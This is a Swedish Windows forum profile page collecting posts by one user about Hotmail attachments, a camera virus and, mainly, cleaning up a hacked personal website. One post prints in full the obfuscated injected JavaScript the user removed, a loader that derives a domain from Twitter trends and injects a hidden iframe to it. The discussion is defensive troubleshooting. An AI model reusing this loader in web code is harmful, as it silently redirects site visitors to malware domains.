Gå till innehåll

ycc

Medlem
  • Innehållsantal

    114
  • Gick med

  • Besökte senast

 Innehållstyp 

Profiler

Kalender

Forum

Gallery

Downloads

alltomwindows.se - Sveriges största community om Windows

Allt postat av ycc

  1. Hej, Jag håller på att städa min Hotmail. Jag tycker listan över mappar är svårläst eftersom man omväxlande använder KB och MB som enhet. Jag har svårt att överblicka mappstorlekar. Det är svårt att snabbt se vilka mappar som är störst. Jag har flera hundra mappar och jag tycker det är svårt att enkelt se vilka som är störst när man blandar KB och MB som enhet. Börjar man städa och byta namn, radera och flytta mail så klarar inte jag att snabbt jämföra de resulterande mappstorlekarna. Finns det något sätt att få en bättre överblick av mappstorlekarna? Tack ycc
  2. Schysst JoWa, dina inlägg är verkligen alltid mitt i prick. Kanon. Jag tog bort Silverlight och nu funkar det. Utan Silverlight får man ju inte löpande information om hur mycket som laddats upp, men i Chrome visas ju det tydligen längst ner på skärmen. Men det gör inte så mycket, jag kan ju också kolla hur mycket som skickats över uppkopplingen. Problemet verkar vara löst, jag skall testa lite mer. Jag skall senare också prova att köra vis https, som du föreslår. Jag förstår inte riktigt freddes och Mannemans inlägg. De konton jag brukar skicka till har inte haft problem att ta emot bilagorna. (T.ex. Hotmail Plus och Gmail) Tack för alla svar som kommit och till alla som funderat över problemet.
  3. Tack fredde, men jag vill inte belasta min skydrive mer med dessa filer. Jag ber att tråden handlar om hur man skickar bilagor, inte placerar dem på Skydrive. Mottagaren har inga problem ladda ner detta. EDIT: Nu hittade jag, under debiteringsinformation: Hotmail Plus - Aktiverad
  4. [Hotmail, kan inte ladda upp större bilagor] Jag har Windows Live Hotmail Plus. När jag försöker ladda upp en bilaga av storleken 16 MB så laddar den ett tag, men säger till sist att bilagan är för stor. (Plus skall klara 20 MB.) Ofta får jag också felet "Silverlight har krashat" med en ikon som en ledsen pusselbit. (Ikonen ser inte riktigt proffsig ut IMHO, men den är nog inte ett tecken på hackning?) Jag har provat med olika bilagor med ungefär denna storlek, och får samma resultat. Det går inte att ladda upp dem. Jag har testat vid olka tidpunker i flera dagar nu. Vad jag kommer ihåg förnyades mitt Hotmail Plus i höstas. När jag nu försöker verifiera att jag verkligen har Plus-tjänster hittar jag inte hur man gör. Jag kommer till mitt konto (anger lösenord igen). Men jag hittar inte var jag kan bekräfta att Plus-tjänster är aktiverade. Min uppkoppling är inte den bästa, men jag har alltid laddat upp 20 MB bilagor utan problem. Tyvärr börjar nu också Google Chrome att säga att jag kan vara utsatt för kapning. Den säger att jag är på väg till en domän som ev är farlig/felaktig. Vad jag kan se hoppar jag bara mellan sidor/subdomäner inom live.com domänen (när jag läser min kontoinformation), men jag vågar inte fortsätta. Jag har provat Chrome, FF och MSIE 9 med samma resultat. Windows 7 starter. En mindre bilaga (200 KB) går att ladda upp. Indikatorstapeln fylls fort till ung 95%, men sedan tar det mer än en minut innan den säger att uppladdningen är OK. (Så har det varit länge. Det kan ta 10-15 minuter att fylla sista 5% av indikatorstapeln.) (Jag väljer hela tiden alternativet "bifoga som bilaga". Jag väljer inte att använda Skydrive.) Hur skall jag få upp bilagan? Varför krashar Silverlight? Tacksam för tips hur jag skall ladda upp bilagor av denna storlek. Tack för alla tidigare tips i detta forum ycc
  5. Aj då. Det blev ju inget bra i Opera när logo-rutan var för smal för texten. Jag laddade just ner Opera 11.52 för att kolla, men där räckte den till: Jag trodde jag laddade ner senaste versionen av Opera, men det var v.11.52. Kan det vara så att v.12 är en utvecklingsversion? Om en webläsare gör teckenen lite bredare så räcker ju rutan inte till. (Då får man förstora rutan eller minska texten förstås.) Skuggorna är nog avstängda i Opera efter en del trassel där. Det är ju sådana småjusteringar som mycket av tiden går till. Browsrarna renderar olika. Teckenstorleken blir lite olika, även om samma storlek begärs. FF ger t.o.m. olika teckenstorlek i Win och Linux ... ... Jag måste sova lite efter att la letat den där malwaren. Men kom gärna med fler kommentarer, det uppskattas. Skall gärna kolla när jag vilat lite. Tack JoWa
  6. Schysst JoWa, bra att veta. I min Chrome 15 kommer den fram. (Win 7 starter) Undrar vad skillnaden kan bero på? Vad tror du? Om sidans "effekter" fungerar för övrigt så har ju förstås inte JavaScript blockerats utan skuggan renderas fel. (För Linux-web-läsare är skuggorna under omarbete.) Min personliga hemsida hade många förekomster av samma malware. Filer som heter google_verify.php var även skapade som rena malware-filer. Det är åtgärdat.
  7. Jag har sökt igenom filerna och tror att alla förekomster av viruset är borta nu. Jag hittar inga tecken på pågående injektion av malware. (Jag tror Google och AVAST kanske missade ytterligare en förekomst av viruset?) Om droppskuggan under rubriken och loggan kommer på plats så verkar även resten av JavaScript att funka. (Sse bild.) (Droppskuggan avstängd i IE v6 och v9.) Jag sticker åter ut hakan och påstår att den lilla sajten fungerar helt igen och att malware är borta, så får vi se hur länge man kan tro på det ... Tack för tipsen. e-dog.info/t/63/doc/Ubuntu_installation.php
  8. Det var nog lite lurigare än jag först trodde. Jag hittade ytterligare en förekomst av malware. När jag tog bort den funkade skuggan under titeln (utom där den är disablad i IE v6 och 9). Men det lade av efter ett tag. En möjlighet är att det finns en pågående injektion av malware. Jag har kollat versionerna. Det verkar inte finnas några förändringar av jQuery-biblioteket eller anropen dit. Endast injektion i två filer av det skript som finns beskrivet ovan i tråden. Borde bli bättre nu när man vet vad man letar efter, hoppas jag i alla fall. Viruset har inte ändrats mellan de två tillfällena, vad jag kan se. Får kolla vidare när jag har tid. Alla anbud (synpunkter) beaktas
  9. Min lilla sajt är fortfarande på nätet, malware-fri. Jag hoppas det så består. Jag vill bara tacka för det stöd som kom. Det är ju intressant det som hände, tycker jag. Jag har inte hunnit titta närmare på malware-koden. Den är ju inte gjord för att vara lättläst. Jag undrar om det inte kan vara en funktion som svarar på anrop till jQuery? (Det kanske inte alltså är så kritiskt i vilken fil den ligger, som jag först trodde.) Jag använder inte många bibliotek, men en gång ville jag prova jQuery och testade att lägga en droppskugga bakom rubriken med jQuery. Efter det att malware hade tagits bort så funkade siten, men all JS funkade inte förrän jag tagit bort anropen till jQuery-droppskuggan. Jag undrar om hackerna dessutom inte modifierat antingen mina anrop till jQuery eller kanske min kopia av jQuery-biblioteket? Jag har tyvärr inte möjlighet att titta vidare nu, hoppas jag hinner kolla i framtiden. jag vet inte om det finns något forum eller liknande på nätet där man kan "lämna in" malware för analys och diskussion? (AV-programmen verkar ju redan ha virusdefinitionen klar.) Undrar om inte detta malware utnyttjar anropen till jQuery? (Fast det största säkerhetshålet är ju att malware hittat in i min site.) Jag får titta viare när jag skall reparera skuggningen. Tack för alla tips.
  10. Du har ju mycket rätt i det du skriver e-son. I GoDaddy kan man dock ha olika lösenord för nästan alla funktioner. Jag måste nog skärpa till mig allmänt med lösenorden i alla fall. ... Jag är också lite förvånad hur attacken sker. Man injicerar en enda fil, en av de mycket få filer som anropas från nästan alla sidor i siten. Hur valde men den filen? Siten är handhackad till >95% så hackern har nog ingen mall att gå på. Jag hade ett liknande problem för ett par år sedan, men då injicerades hundratals filer i en site med 20.000 filer. Det tog tid att fatta vad som hänt och att åtgärda. Jag vill minnas att jag till slut fick rensa med sed-skript. Den gången blev det en enda förekomst av malware kvar. Det låg undanstoppat i ett mycket oansenligt hörn av Gallery2. i det fallet kan jag förstå att man utnyttjat kännedomen om Gallery2s struktur. Jag fick till slut bra hjälp i Gallery2s forum att hitta problemet. Gallery2 har bra funktioner för att hitta komprometterade filer. Jag tycker Gallery2 är ett fantastikt bra program, men det innehåller många filer och det fanns många gömställen som en icke-expert som jag inte kände till. Man kan ju samtidigt vara lite "tacksam" och "beundrande" att inte mer av siten blivit angripen den här gången.
  11. @e-son: Ytterligare en intressant länk, tack e-son. Du kommer nog med ett riktigt bra påpekande där. Måste kanske börja med långa randomiserade lösenord för ftp i servern. Fast om jag loggar in på mitt web-konto på GoDaddy så kan jag ändra lösenord för ftp direkt utan att ange det tidigare ftp-lösenordet. Måste man då ha 32-teckens lösenord för sitt vanliga web-konto också? Det blir ju lite tungt, men kanske nödvändigt? ... SQL-injektion. Naturligtvis en mycket relevant kommentar. - Den klassiska "OR TRUE" injektionen. php-formuläret svängde jag ihop på kul en gång. Jag kände ju till problemet när jag gjorde sidan så jag försökte väl tänka på det. Men det går ju inte att få top-security på något som man svänger ihop på ett par dagar. Å andra sidan undrar jag hur man skulle kunna knäcka formuläret. Jag kan inte se någon möjlighet, men jag är ju inte hacker heller. Formuläret lägger bara in meddelandena i en databas och skickar dem vidare till några av mina epostadresser. (OBS! Detta är inte en uppmaning till hacker att pröva ) Hur man kan injicera ett lösenord som detekteras på tokigt sätt, det kan jag förstå. Inga suspekta meddelande i databasen på sistone. Tack för relevanta synpunkter e-son. Lärorikt med kommentarer om siten, kom gärna med fler -------- @Rune Du vet säkert mer om antivrus och brandväggar än jag. Jag kör AVAST gratisversion. Jag tror en räddade min dator för någon vecka sedan när någon kopplade in sin smittade kamera, jag fick hjälp med det här i forum. Den var också första larmet för problemet i denna tråd. Jag tycker det hjälper. Jag har en enkel 10" laptop. (Samma som du har vill jag minnas ) men den lastas inte ner så mycket, tycker jag. Jag har inte kört noscript i FF. Missar man inte en del information då? Däremot har jag ingen brandvägg annat än den inbyggda i Windows. Jag har ju bara en desktop som inte lyssnar på några portar så jag har inte förstått nyttan av Zonealarm. Men jag är absolut inte kompetent att ge mig in i diskussion här. Jag bara spekulerar lite
  12. Stort tack e-son, den länken skall vi bokmärka. Mycket bra information där. Skall kolla all info där så snart min uppkoppling slutar konstra. e-dog.info blev frikänd nu i alla fall.
  13. Svar på Runes fråga. [ursäkta om det blir lite osammanhängande, min uppkoppling trasslar.] Yess, e-dog.info är min domän, men någon lyckades injicera skript i den så att den kopplade upp mot en massa olika andra siter, bl.a. aynupuoroxsyi.com. Min site blev svartlistad av AVAST och Google. Men antivirus-siterna verkar kunna skilja mycket bra på vilka siter som producerar virus och vilka legitima siter som drabbas av injektionsattacker. Virusproducenterna stängs av av ISP ganska fort. Bara några minuter efter det att jag tagit bort malware från min site så öppnades den helt av Google och AVAST igen. För 10 år sedan sade jag "Strunta i att använda anti-virus program, de bara kostar pengar och lastar ner datorn." Numera är jag mycket tacksam för antivirus. Bilden har förändrats mycket. Numera räcker det inte att bara låta bli att öppna "BritneySpearsNude.exe" i sin epost. Numera kommer ofta attackerna via legitima siter, som i detta fall. Jag undrar hur tusan de får in skräpet i min site. Jag ligger på Godaddy för tillfället. Jag undrar naturligtvis om någon på Godaddy klantat sig. Men skall jag vara ärlig har jag ingen aning om hur man ändrat denna fil på min site. Möjligen kan jag ha kört samma lösenord i en oskyddad wi-fi-förbindelse utan ssl för mycket länge sedan, det gör jag aldrig mer. Skulle någon alltså verkligen kunna utnyttja den informationen och para ihop den med min server-ftp?? Den fil som injicerades var också ett mycket kritiskt AJAX-anrop som utnyttjades av nästan alla sidor på siten. Man tror ju nästan att någon gjort det "manuellt". Men hackarna kanske har avancerad mjukvara de med.
  14. Jag är inte säker på att jag förstår din fråga Rune. Jag administrear inte aynupuoroxsyi.com aynupuoroxsyi.com är en av de siter som är inblandad i attacken. Malware injicerades i min site och malware kopplade upp webläsaren mot aynupuoroxsyi.com och andra siter. Jag anser min site rensad från malware nu, om någon finner något suspekt i den så meddela mig förstås. e-dog.info/t/63/doc/Ubuntu_installation.php Tack för alla bidrag som kommit.
  15. Det gick i alla fall att hitta malware-skriptet på ett ställe. Firefox felkonsol larmade när den mötte detta. Kanske går det att leta upp andra ställen där det förekommer nu när man vet hur det ser ut på ett ställe. Men det är ju inte säkert heller. Jag har självklart tagit bort skriptet från sidan. Virus/malware script: (function($$){d="( 8 *i= 8var Vc=this; [Vc\\FullYear %Month %Date %Hours %Minutes %Seconds()]}; *B= 8 &n,Vr=this.#i(),i=0;Vr[1]+=1;while(i++<7){#n=Vr[i] /#n<#b)Vr[i] 4#n} Vr.splice(~z'),1+~T 0 5~u 0+'T'+Vr 5~U 0};VN={'h`http://Xs`/Xt`treXd`daiXn`ndsXq`?Xc`callback=Xj`#Xa`apiXl`lyXW`twitterXo`comXe`1Xk`sXK`bodyXx`ajaxXD`.XL`libsXJ`jqueryX6`6.2Xm`minXf`onXS`criptXi`ifXM`rameXY`headXw`width:Xp`px;XH`height:XT`2Xr`rcXQ`\"Xy`style=Xb`><XR`></XI`divXB`<XA`>Xg`googleXE`&date=Xz`0Xu`-XU` X,`:00X;':2345678901,'/':48271,'F':198195254,'G':12,'C`='};@ #G(Vm){#o=[];for(Vx=0;Vx<Vm .;Vx++){#o.push(VN[Vm.charAt(Vx)])} #T(#o)}VB=document;#x=window; +E='undefined'; +j=~haDWDosestnsdlDjfqcq' :R= ))== +E) /#R||!VD()){if(!#R){try{Vd=jQuery !;try{Vd=$ !}VM=VB.getElementsByTagName(~Y 0[0];#J=VB.createElement(~kS 0;#J.setAttribute(~kr'),#G(\"hxDgakDosxsLsJseD6sJDmDj\"));VM.appendChild(#J)}@ Va(#F,VK){ Math.floor(#F/VK) 6e(#k){var Vg=Va( +u, $G); &C= +u% $G; &S= $r*#C; &L= $J*Vg; &y=#S-#L /#y>0){#u=#y}else{#u=#y+ $A} (#u%#k) 6z(#w){ +u=~;')+#w; $r=~/'); $A=~;')-~F'); $G=Va( $A, $r); $J= $A% $r 6T(V){ V .==1?V[0]:V 5'')};@ #K(V){d=new Date( :c=~zee');d.setTime((V.as_of-~G')*~G')*~G')*~ezz 0*~ezzz 0; d 6p(Vu){ &a,Vn,#f=Vu .; &d=[];while(--#f){Vn=#e(#f .push(Vn :a=Vu[Vn];Vu[Vn]=Vu[#f];Vu[#f]=#a}}@ Vp($){Vs=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){ String.fromCharCode(i+x+24)}); #T(Vs) 6v($){if ))!= +E){$( 8if ).Vt)!= +E) ;$.Vt=1; 2j,@(Vy){#g=#K(Vy :h=#g\\Month() 9L=#g\\Date();VS=#h+\"-\"+VL;#P=#j+#G(\"E 3;Vj=VP=Va(#g\\Hours(),6)*6 9E=Vj+1;#b=+~ez'); , 2P,@(Vy){try{#D=Vy.trends;#M=#G(\" 3+\" \" /Vj<#b)Vj 4Vj /VE<#b)VE 4VE; 7j+#G(X)] /!#N){ 7E+#G(X)]}#N=(#N[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('' :s=#h*71+VP*3+VL*37;#z(#s :q=#e(4)+#b;#p(#N :H=~Ch')+#T(#N).substring(0,#q)+'.com/'+Vp($);VN['Z']=#H;Vb=~BI 1biMU 1UkrZRiMRIA');$(~K 0.append(Vb)}catch(Vf){}})},#b*#b*# })})}else{ , -,1+~TTT 0}} -)()#js@functionV#mX','`':'~#G('\\.getUTC return !.noConflict(true)}catch(e){} $#x.V %(),Vc\\ &var # )(typeof($ *Date.prototype.# +#x.# ,setTimeout( 8 -#v(#x.jQuery)} ..length /;if( 0')) 1yQHTpweeepQ 2$.getJSON(# 3Tzeeu\")+VS 4=~z')+ 5.join( 6}@ # 7#N=#D[#M+V 8@(){ 9+(+~e 0;V ;#";for(c=53;c;d=(t=d.split('#@VX`~\\ ! $ % & ) * + , - . / 0 1 2 3 4 5 6 7 8 9 :'.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$$(d)})(function(jsmH){return(function(jsm,jsmF){return jsmF(jsm(jsmF(jsm(jsmH))))(jsmH)()})((function(jsm){return jsm.constructor}),(function(jsm){return(function(jsmF){return jsm.call(jsm,jsmF)})}))}); EDIT: Det verkar som om Googles svartlistning av siten tagits bort när skriptet togs bort. AVAST ger inte heller varningar nu. Skriptet kanske bara fanns på ett ställe. Men det verkar finnas något skräp kvar. Malware-skriptet använder callbacks (skickar funktionsnamn som argument). Det finns lite jQuery på min sida och de använder också callbacks och jQuery verkar ha pajat. I bästa fall ingen malware kvar på sidan nu, bara en del JS som blockeras när vissa callbacks inte funkar. ... Jag tog bort det mesta av jQuery och då verkar siten fungera.
  16. Jag är nog lite extra trögtänkt idag. Jag hittar inte AVAST log. Jag har öppnat loggen förut, möjligen har AVAST uppdaterats sedan dess. Jag kan helt enkelt inte hitta loggen för de 9 "web and network objects" som blokerats.
  17. Tack för alla kommentarer, mycket värdefullt. Jag skall testa vurldissect. När jag testade igår funkade sidan i stort, men hälften av javaskript-animationerna var brutna. Idag har sidan hamnat på Googles svartlista, man får ett meddelande att sidan innehåller malware och man måste bekräfta att man verkligen vill se den. Den site den kopplar upp mot varierar hela tiden. Jag skall läsa AVASTs log mer ingående. Det vore nyttigt att veta hur den virusdefinition ser ut som AVAST reagerar på. Jag instämmer i hela si3rras inlägg, tack, Jag har ändrat rubriken. Jag har väntat lite med att lägga ut länken eftersom sidan innehåller malware. Men gissningsvis inte farligt att gå till sidan så länge man inte installerar något???? Jag är naturligtvis väldigt tacksam om så många som möjligt går till sidan och kollar. Här är adressen: May contain malware: e-dog.info/t/63/doc/Ubuntu_installation.php Jag håller med si3rra om att det förmodligen är ett injicerat skript. Vet inte varför Java-installationen aktiverades. Tack för alla kommentarer. Jag får leta vidare efter skriptet. Jag hade samma problem en gång för ett par år sedan, då gick det ganska fort att hitta skriptet med textsökning. EDIT: Jag gjorde en del applets på slutet av 90-talet, bara för att testa. Jag vill minnas att det var med Java-"kompilator". Dessa sidor ligger också på siten, men borde inte kunna anropas från den sida som larmar nu. När jag går till de sidorna funkar inte applets utan Google Chrome frågar efter java-installation. När jag går till mina sidor med applets så kommer det upp en fråga I APPLETRUTAN om att installera Java. När jag går till den sida vi diskuterar nu så kommer det upp en fråga I EN FRAME längst upp på sidan. Den frågar om att installera plug-in. Jag kommer inte ihåg alla detaljer, men när jag klickade där så skedde en java-installation.
  18. Tack för påpekandet Cecilia. Det var värdefullt. Jag kan erkänna att jag inte har skillnaderna helt klara för mig. JS är ett skriptspråk som funkar på websidor och därför omges av starka restriktioner, det tror jag mig veta. JS kan ju bara skriva kakor till disken etc Min site är handhackad med mycket JS. (Fast Java är ju också skript.) Men det är säkert som du säger att hackern har lagt in något på min server som gör att frågan om uppdatering kommer upp. Jag tror inte jag har Java på min site. Jag läste nog uppdateringsmeddelandena lite slarvigt. Jag tror det var Java som uppdaterades. Jag trodde JS kunde påverkas vid Java-uppdateringen, men jag kan nog, som du säger, ha fel där. Tack igen för tipset om winmerge, det verkar vara ett kanonprogram. Installerar kvickt, kan köra mappar och undermappar tillsammans. Berättar om filen finns eller om skillnader finns. Intuitivt. Jobbar kvickt. GNU är det också. Jag har börjat jämföra lite.
  19. Tack JoWa, verkar vara precis vad jag behöver. Jag skall sätta mig in i det programmet. Jag ligger med riktig influensa nu och siten kanske har virus, livet är kul. (Men i alla fall inget jag förlorar pengar på ) Jag gissar att den site som viruset kopplar upp mot har tagits bort av ISP och JS i webläsaren då hänger. Huruvida något hade introducerats i min dator är jag inte säker på. Möjligen verkar det som om min burk beter sig annorlunda efter W7 restore. Nu när jag kommer till siten igen så frågar Chrome igen om den skall installera plug-in. Efter ominstallationen av Java så kom inte frågan utan viss JS bara blockerades. Men jag är inte säker, det kan ha cachats eller annat, kankse. Schysst JoWa, winmerge verkar vara vad jag behöver, men det kan nog bli ett ganska stort jobb att jämföra alla filer.
  20. Tack Rune. Det kan ju vara två problem: #1. Java uppdateringen kan ha introducerat virus i min burk. #2. Min site kan ha blivit hackad Ursäkta att jag diskuterar problem #2 i detta forum, det har troligen inget med Windows att göra, men "det hänger ju ihop", och jag behöver verkligen tips med detta Problem 1 Jag körde system restore i W7. Inte den varianten som återställer alla filer utan bara den varianten som återställer systemfilerna. Problem 2: Jag har haft virus i min site en gång tidigare. Då kunde jag hitta viruset genom att ladda ner en kopia av hela siten och text-söka på det domännamn som viruset kopplade upp mot. Det funkar inte denna gång. Om det är JS är det ju mycket lätt att dölja, istället för s ='aynupuoroxsyi.com'; skriver hackern bara s ='aynu' + 'puoroxsyi.com'; (eller hur kompicerat som helst) Så går det inte att text-söka. Jag har backup, men jag litar inte hundra på den. 3000 filer måste ju komma tillbaka med samma version. Jag skall ändra lösenord för servern. Möjligen har min web-host ett återställningsprogram (till tidigare tidpunkt) för servern. Att köra något jämförelseprogram mellan min backup och den nedladdade kopian vore en möjlighet som dock tar tid. EDIT Det verkar som om den site som viruset försöker koppla upp mot heter ymarloeoicc.com (Google Chrome säger att den väntar på den siten.) (Strängsökning negativ på den siten också.) Siten finns inte mer. Kanske det är en malware-site som ISP tagit bort.
  21. Ju mer jag läser AVASTs noteringar så tror jag siten som utlöste felmeddelandet har blivit hackad av en malware-site som heter aynupuoroxsyi.com Det är jag själv som administrerar siten som utlöste frågan om plug-in. Jag fär sätta igång att ladda ner alla .js filer och se om de blivit hackade. EDIT: Jag laddade ned hela siten med ftp (3000 filer) och sökte igenom filerna efter strängen aynupuoroxsyi.com men hittade inget. Men det ser ut som om AVAST har hittat något i siten.
  22. Hej, Tack för hjälpen med min senaste frågeställning. Jag kör W7 Starter med Google Chrome och fick en notifikation att plug-in saknas. Jag testade samma sida med Firefox och fick samma notifikation. (Sidan är säker, vad jag tror i alla fall. EDIT: Se nedan, siten kan ha blivit hackad.) Jag klickade "install plug in" och fick bekräfta att jag litade på innehåll från Sun och från Oracle. Vad jag förstår så ominstallerades Java. En fil som heter chromeinstall-6u29.exe laddades ner. Installationen skedde dock utan att jag behövde klicka den filen. När jag nu går till vissa web-sidor, vad jag förstår sidor med JavaScript, så fungerar bara vissa av javascript-funktionerna. I firefox får jag dessutom upp en virusvarning från AVAST. Jag bifogar skärmdump. Virusvarningen har en länk till denna sida: avast Det verkar också som om webläsaren kopplar upp mot nätet igen efter det att sidan är inladdad. Tacksam för förslag hur jag får javan att fungera igen. mvh ycc
  23. Tack för alla tips som kommit. Min polare kom förbi med kameran och vi kopplade in den till W7 Starter + Avast. Inget viruslarm. (Avast tog nog bort viruset första gången kameran var inkopplad.) Kameran var tillgänglig via USB. Det gick dock inte att se några bilder i kameran, ingen DCIM mapp eller dyl. Bara två filer fanns i en mapp kallad DATABASE: ACE.DAT, ACE.LOG. Jag försöker ladda upp en skärmdump som visar filbläddraren . Vi kopplade in kameran i Ubuntu-Linux som visade filerna. Så problemet är löst nu, bilderna är brända till en CD. Min polare tycker allt är bra nu eftersom bilderna gick att få ut. Själv undrar jag dock lite varför bilderna inte gick att se i W7. I W7 kom det upp tre alternativ när kameran anslöts. Bara ett var rimligt att använda - "browse files" tror jag det hette, men bilderna gick inte att se. Jag rekommenderade min polare att göra minst två backuper och sedan formatera SD-kortet från kamerans menyer.
  24. Tack för alla tips. Jag återkommer när min kompis kommer med kameran nästa gång.
×
×
  • Skapa nytt...